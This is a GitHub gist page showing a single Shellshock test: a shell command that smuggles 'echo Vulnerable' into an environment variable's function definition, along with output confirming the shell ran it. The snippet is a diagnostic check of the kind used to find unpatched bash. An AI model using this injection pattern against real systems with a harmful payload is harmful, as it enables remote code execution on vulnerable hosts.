Skip to content

Instantly share code, notes, and snippets.

@jamesattard
Created September 26, 2014 08:45
Show Gist options
  • Save jamesattard/55bf7330aafdbb526323 to your computer and use it in GitHub Desktop.
Save jamesattard/55bf7330aafdbb526323 to your computer and use it in GitHub Desktop.
╭─james@darktech ~
╰─$ env X="() { :;} ; echo Vulnerable" /bin/sh -c "echo hello world"
Vulnerable
hello world
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment